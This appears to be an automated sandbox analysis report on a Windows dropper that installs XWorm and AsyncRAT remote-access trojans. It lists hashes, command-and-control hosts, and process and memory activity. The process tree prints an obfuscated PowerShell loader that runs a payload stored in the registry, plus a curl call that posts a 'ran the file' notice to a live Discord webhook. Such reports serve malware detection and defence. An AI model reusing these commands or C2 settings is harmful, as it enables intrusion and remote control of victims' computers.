Analysis
-
max time kernel
150s -
max time network
0s -
platform
windows7_x64 -
resource
win7-20240220-en -
resource tags
arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system -
submitted
22-06-2024 05:30
Static task
static1
Behavioral task
behavioral1
Sample
Dropper.exe
Resource
win7-20240220-en
General
-
Target
Dropper.exe
-
Size
1.4MB
-
MD5
0db5ce13fa3f2058572801bbffcaa3f3
-
SHA1
49580b807ee8e9a7bd4b7a045ceec6c93ae093dd
-
SHA256
9639537e3aa2c1d7866a72856656b9afa4e6c761d7c6ae43a78e1075b38f3b8b
-
SHA512
a46cbf5da20f09e514590e7de8f8e932427b15060724cd716c38e9e6b232003bcdf01db6dcf06300459c0386a7f3bbc2c6c354b578792e8b2ec13de4d1414f4b
-
SSDEEP
12288:B0w1hc0Q53LOAGkjwtBx5n4AYakafNh/ymPj/YDLm7GylDULvEd8oK/mngAmgIv:BrmwDRPjwuB
Malware Config
Extracted
xworm
politics-fiber.gl.at.ply.gg:47430
-
Install_directory
%AppData%
-
install_file
$77-scchost.exe
Extracted
asyncrat
Default
environmental-blank.gl.at.ply.gg:25944
-
delay
1
-
install
true
-
install_file
$77-aachost.exe
-
install_folder
%AppData%
Signatures
-
Detect Xworm Payload 2 IoCs
Processes:
resource yara_rule \Users\Admin\AppData\Local\Temp\$77-sdchost.exe family_xworm behavioral1/memory/2540-11-0x0000000001140000-0x0000000001152000-memory.dmp family_xworm -
Modifies security service 2 TTPs 2 IoCs
Processes:
svchost.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\MpsSvc\Parameters\PortKeywords\DHCP svchost.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Parameters\PortKeywords\DHCP\Collection svchost.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
powershell.EXEdescription pid process target process PID 544 created 436 544 powershell.EXE winlogon.exe -
Async RAT payload 1 IoCs
Processes:
resource yara_rule \Users\Admin\AppData\Local\Temp\$77-aachost.exe family_asyncrat -
Executes dropped EXE 4 IoCs
Processes:
$77-sdchost.exe$77-aachost.exe$77-penisballs.exe$77-install.exepid process 2540 $77-sdchost.exe 2456 $77-aachost.exe 2636 $77-penisballs.exe 2396 $77-install.exe -
Loads dropped DLL 4 IoCs
Processes:
Dropper.exepid process 2916 Dropper.exe 2916 Dropper.exe 2916 Dropper.exe 2916 Dropper.exe -
Drops file in System32 directory 1 IoCs
Processes:
powershell.EXEdescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.EXEdescription pid process target process PID 544 set thread context of 2588 544 powershell.EXE dllhost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies data under HKEY_USERS 2 IoCs
Processes:
powershell.EXEdescription ioc process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.EXE Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 508eb94365c4da01 powershell.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.EXEdllhost.exepid process 544 powershell.EXE 544 powershell.EXE 2588 dllhost.exe 2588 dllhost.exe 2588 dllhost.exe 2588 dllhost.exe 2588 dllhost.exe 2588 dllhost.exe 2588 dllhost.exe 2588 dllhost.exe 2588 dllhost.exe 2588 dllhost.exe 2588 dllhost.exe 2588 dllhost.exe 2588 dllhost.exe 2588 dllhost.exe 2588 dllhost.exe 2588 dllhost.exe 2588 dllhost.exe 2588 dllhost.exe 2588 dllhost.exe 2588 dllhost.exe 2588 dllhost.exe 2588 dllhost.exe 2588 dllhost.exe 2588 dllhost.exe 2588 dllhost.exe 2588 dllhost.exe 2588 dllhost.exe 2588 dllhost.exe 2588 dllhost.exe 2588 dllhost.exe 2588 dllhost.exe 2588 dllhost.exe 2588 dllhost.exe 2588 dllhost.exe 2588 dllhost.exe 2588 dllhost.exe 2588 dllhost.exe 2588 dllhost.exe 2588 dllhost.exe 2588 dllhost.exe 2588 dllhost.exe 2588 dllhost.exe 2588 dllhost.exe 2588 dllhost.exe 2588 dllhost.exe 2588 dllhost.exe 2588 dllhost.exe 2588 dllhost.exe 2588 dllhost.exe 2588 dllhost.exe 2588 dllhost.exe 2588 dllhost.exe 2588 dllhost.exe 2588 dllhost.exe 2588 dllhost.exe 2588 dllhost.exe 2588 dllhost.exe 2588 dllhost.exe 2588 dllhost.exe 2588 dllhost.exe 2588 dllhost.exe 2588 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
$77-sdchost.exe$77-penisballs.exepowershell.EXEdllhost.exedescription pid process Token: SeDebugPrivilege 2540 $77-sdchost.exe Token: SeDebugPrivilege 2636 $77-penisballs.exe Token: SeDebugPrivilege 544 powershell.EXE Token: SeDebugPrivilege 544 powershell.EXE Token: SeDebugPrivilege 2588 dllhost.exe -
Suspicious use of WriteProcessMemory 62 IoCs
Processes:
Dropper.exetaskeng.exepowershell.EXEdllhost.exedescription pid process target process PID 2916 wrote to memory of 2872 2916 Dropper.exe cmd.exe PID 2916 wrote to memory of 2872 2916 Dropper.exe cmd.exe PID 2916 wrote to memory of 2872 2916 Dropper.exe cmd.exe PID 2916 wrote to memory of 2872 2916 Dropper.exe cmd.exe PID 2916 wrote to memory of 2540 2916 Dropper.exe $77-sdchost.exe PID 2916 wrote to memory of 2540 2916 Dropper.exe $77-sdchost.exe PID 2916 wrote to memory of 2540 2916 Dropper.exe $77-sdchost.exe PID 2916 wrote to memory of 2540 2916 Dropper.exe $77-sdchost.exe PID 2916 wrote to memory of 2456 2916 Dropper.exe $77-aachost.exe PID 2916 wrote to memory of 2456 2916 Dropper.exe $77-aachost.exe PID 2916 wrote to memory of 2456 2916 Dropper.exe $77-aachost.exe PID 2916 wrote to memory of 2456 2916 Dropper.exe $77-aachost.exe PID 2916 wrote to memory of 2636 2916 Dropper.exe $77-penisballs.exe PID 2916 wrote to memory of 2636 2916 Dropper.exe $77-penisballs.exe PID 2916 wrote to memory of 2636 2916 Dropper.exe $77-penisballs.exe PID 2916 wrote to memory of 2636 2916 Dropper.exe $77-penisballs.exe PID 2916 wrote to memory of 2396 2916 Dropper.exe $77-install.exe PID 2916 wrote to memory of 2396 2916 Dropper.exe $77-install.exe PID 2916 wrote to memory of 2396 2916 Dropper.exe $77-install.exe PID 2916 wrote to memory of 2396 2916 Dropper.exe $77-install.exe PID 2916 wrote to memory of 2396 2916 Dropper.exe $77-install.exe PID 2916 wrote to memory of 2396 2916 Dropper.exe $77-install.exe PID 2916 wrote to memory of 2396 2916 Dropper.exe $77-install.exe PID 2400 wrote to memory of 544 2400 taskeng.exe powershell.EXE PID 2400 wrote to memory of 544 2400 taskeng.exe powershell.EXE PID 2400 wrote to memory of 544 2400 taskeng.exe powershell.EXE PID 544 wrote to memory of 2588 544 powershell.EXE dllhost.exe PID 544 wrote to memory of 2588 544 powershell.EXE dllhost.exe PID 544 wrote to memory of 2588 544 powershell.EXE dllhost.exe PID 544 wrote to memory of 2588 544 powershell.EXE dllhost.exe PID 544 wrote to memory of 2588 544 powershell.EXE dllhost.exe PID 544 wrote to memory of 2588 544 powershell.EXE dllhost.exe PID 544 wrote to memory of 2588 544 powershell.EXE dllhost.exe PID 544 wrote to memory of 2588 544 powershell.EXE dllhost.exe PID 544 wrote to memory of 2588 544 powershell.EXE dllhost.exe PID 2588 wrote to memory of 436 2588 dllhost.exe winlogon.exe PID 2588 wrote to memory of 484 2588 dllhost.exe services.exe PID 2588 wrote to memory of 492 2588 dllhost.exe lsass.exe PID 2588 wrote to memory of 500 2588 dllhost.exe lsm.exe PID 2588 wrote to memory of 592 2588 dllhost.exe svchost.exe PID 2588 wrote to memory of 672 2588 dllhost.exe svchost.exe PID 2588 wrote to memory of 756 2588 dllhost.exe svchost.exe PID 2588 wrote to memory of 804 2588 dllhost.exe svchost.exe PID 2588 wrote to memory of 840 2588 dllhost.exe svchost.exe PID 2588 wrote to memory of 972 2588 dllhost.exe svchost.exe PID 2588 wrote to memory of 284 2588 dllhost.exe svchost.exe PID 2588 wrote to memory of 1052 2588 dllhost.exe spoolsv.exe PID 2588 wrote to memory of 1072 2588 dllhost.exe taskhost.exe PID 2588 wrote to memory of 1128 2588 dllhost.exe Dwm.exe PID 2588 wrote to memory of 1152 2588 dllhost.exe Explorer.EXE PID 2588 wrote to memory of 1176 2588 dllhost.exe svchost.exe PID 2588 wrote to memory of 1712 2588 dllhost.exe DllHost.exe PID 2588 wrote to memory of 1736 2588 dllhost.exe svchost.exe PID 2588 wrote to memory of 2940 2588 dllhost.exe sppsvc.exe PID 2588 wrote to memory of 2916 2588 dllhost.exe Dropper.exe PID 2588 wrote to memory of 2280 2588 dllhost.exe conhost.exe PID 2588 wrote to memory of 2540 2588 dllhost.exe $77-sdchost.exe PID 2588 wrote to memory of 2456 2588 dllhost.exe $77-aachost.exe PID 2588 wrote to memory of 2636 2588 dllhost.exe $77-penisballs.exe PID 2588 wrote to memory of 2400 2588 dllhost.exe taskeng.exe PID 2588 wrote to memory of 544 2588 dllhost.exe powershell.EXE PID 2588 wrote to memory of 1772 2588 dllhost.exe conhost.exe
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{a21b25eb-539e-49b8-9dd2-a1d4c5f53eac}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\services.exeC:\Windows\system32\services.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch2⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}3⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS2⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted2⤵
- Modifies security service
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted2⤵
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"3⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs2⤵
-
C:\Windows\system32\taskeng.exetaskeng.exe {ECC5C892-7EC0-4EB1-BB4B-9774F5A5B99C} S-1-5-18:NT AUTHORITY\System:Service:3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SO'+'F'+''+[Char](84)+''+[Char](87)+''+[Char](65)+''+[Char](82)+''+'E'+'').GetValue(''+[Char](36)+'7'+[Char](55)+''+[Char](115)+''+[Char](116)+''+[Char](97)+''+'g'+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService2⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe2⤵
-
C:\Windows\system32\taskhost.exe"taskhost.exe"2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation2⤵
-
C:\Windows\system32\sppsvc.exeC:\Windows\system32\sppsvc.exe2⤵
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\lsm.exeC:\Windows\system32\lsm.exe1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Users\Admin\AppData\Local\Temp\Dropper.exe"C:\Users\Admin\AppData\Local\Temp\Dropper.exe"2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c curl "https://discord.com/api/webhooks/1253936460533596222/A6HxzIjIDIKyWDj0ckcP1MgqmlK_CMtEmYhM4dwuWmPFk2q_02wySjZSHZuHPAmtdoBM" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""`Admin` Ran The File!"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"3⤵
-
C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe"C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe"C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe"C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\$77-install.exe"C:\Users\Admin\AppData\Local\Temp\$77-install.exe"3⤵
- Executes dropped EXE
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-2886199161402797966904758125-964041378-111430048614937478262578368031342322812"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-13600568041519704366-7808701191735270432160028257112206212381203431390-1111462397"1⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
\Users\Admin\AppData\Local\Temp\$77-aachost.exeFilesize
66KB
MD5f10712f4faa374be8f37668c5ebed4a6
SHA1bb30e941c4f91ae3178539e993abecbfd838fdb0
SHA256d66c793c2e3290b3996b54f5a2fc2c1973fc41677ec46ce0e0e30aa4e7916acf
SHA512cb838ec3d65ca49bb25bd93e06666e6c2640c66fd0b68fc826ca763a3dedcc4d4033abab7cfca2fff3bf08ed98d14533abf19026fd9d1845dbf09fcb241840ac
-
\Users\Admin\AppData\Local\Temp\$77-install.exeFilesize
163KB
MD51a7d1b5d24ba30c4d3d5502295ab5e89
SHA12d5e69cf335605ba0a61f0bbecbea6fc06a42563
SHA256b2cc4454c0a4fc80b1fc782c45ac7f76b1d95913d259090a2523819aeec88eb5
SHA512859180338958509934d22dbc9be9da896118739d87727eb68744713259e819551f7534440c545185f469da03c86d96e425cdf5aae3fb027bb8b7f51044e08eaa
-
\Users\Admin\AppData\Local\Temp\$77-penisballs.exeFilesize
256KB
MD518f497deffe88b6b2cff336a277aface
SHA14e1413241d3d3e4dbff399d179f8fd64f3ecd39e
SHA2568133c3c1e5dde7c9b4d9d5c9a07e37b733fd0223fc9d035c3f386f034a434af5
SHA51235c804ec73001fe66d57bd2fadc51cd399edbc2e550c4257f29aac5a24a9f9c030c582d50239dec41605801263fd5739444aa14f9683f99f726152cc1bb6920d
-
\Users\Admin\AppData\Local\Temp\$77-sdchost.exeFilesize
50KB
MD577a71f3a441aa3bf824967e52413bec5
SHA1c3d6df5cfc5eefaadf9bcb3703484e3cadf79588
SHA2561e6c87e492d90fbc4b9d2a16676a58735e33861f780c6c3020869337a0ccfc82
SHA51231c413cb410b366b63f0e763e288c2795584f9c7fda41eeea45f7d32a853da87e3ab58a144ff02a75b1d1803c7fef9fe3d561133a50a4e600799ed6f9050fd5b
-
memory/436-62-0x000007FEBE7E0000-0x000007FEBE7F0000-memory.dmpFilesize
64KB
-
memory/436-63-0x0000000037270000-0x0000000037280000-memory.dmpFilesize
64KB
-
memory/436-53-0x0000000000B90000-0x0000000000BB5000-memory.dmpFilesize
148KB
-
memory/436-55-0x0000000000C50000-0x0000000000C7B000-memory.dmpFilesize
172KB
-
memory/436-51-0x0000000000B90000-0x0000000000BB5000-memory.dmpFilesize
148KB
-
memory/436-61-0x0000000000C50000-0x0000000000C7B000-memory.dmpFilesize
172KB
-
memory/436-54-0x0000000000C50000-0x0000000000C7B000-memory.dmpFilesize
172KB
-
memory/484-69-0x0000000000190000-0x00000000001BB000-memory.dmpFilesize
172KB
-
memory/484-75-0x0000000000190000-0x00000000001BB000-memory.dmpFilesize
172KB
-
memory/484-76-0x000007FEBE7E0000-0x000007FEBE7F0000-memory.dmpFilesize
64KB
-
memory/484-77-0x0000000037270000-0x0000000037280000-memory.dmpFilesize
64KB
-
memory/492-91-0x0000000037270000-0x0000000037280000-memory.dmpFilesize
64KB
-
memory/492-83-0x00000000000C0000-0x00000000000EB000-memory.dmpFilesize
172KB
-
memory/492-89-0x00000000000C0000-0x00000000000EB000-memory.dmpFilesize
172KB
-
memory/492-90-0x000007FEBE7E0000-0x000007FEBE7F0000-memory.dmpFilesize
64KB
-
memory/500-97-0x00000000002F0000-0x000000000031B000-memory.dmpFilesize
172KB
-
memory/544-35-0x000000001A090000-0x000000001A372000-memory.dmpFilesize
2.9MB
-
memory/544-38-0x0000000077230000-0x00000000773D9000-memory.dmpFilesize
1.7MB
-
memory/544-36-0x0000000000A50000-0x0000000000A58000-memory.dmpFilesize
32KB
-
memory/544-37-0x0000000001400000-0x000000000142A000-memory.dmpFilesize
168KB
-
memory/544-39-0x0000000077110000-0x000000007722F000-memory.dmpFilesize
1.1MB
-
memory/2456-19-0x0000000000E00000-0x0000000000E16000-memory.dmpFilesize
88KB
-
memory/2540-11-0x0000000001140000-0x0000000001152000-memory.dmpFilesize
72KB
-
memory/2588-41-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/2588-40-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/2588-47-0x0000000077110000-0x000000007722F000-memory.dmpFilesize
1.1MB
-
memory/2588-42-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/2588-43-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/2588-45-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/2588-48-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/2588-46-0x0000000077230000-0x00000000773D9000-memory.dmpFilesize
1.7MB
-
memory/2636-33-0x00000000001D0000-0x00000000001D6000-memory.dmpFilesize
24KB
-
memory/2636-27-0x00000000001F0000-0x0000000000236000-memory.dmpFilesize
280KB
-
memory/2916-0-0x000000007443E000-0x000000007443F000-memory.dmpFilesize
4KB
-
memory/2916-1-0x00000000001A0000-0x0000000000310000-memory.dmpFilesize
1.4MB
-
memory/2916-223-0x000000007443E000-0x000000007443F000-memory.dmpFilesize
4KB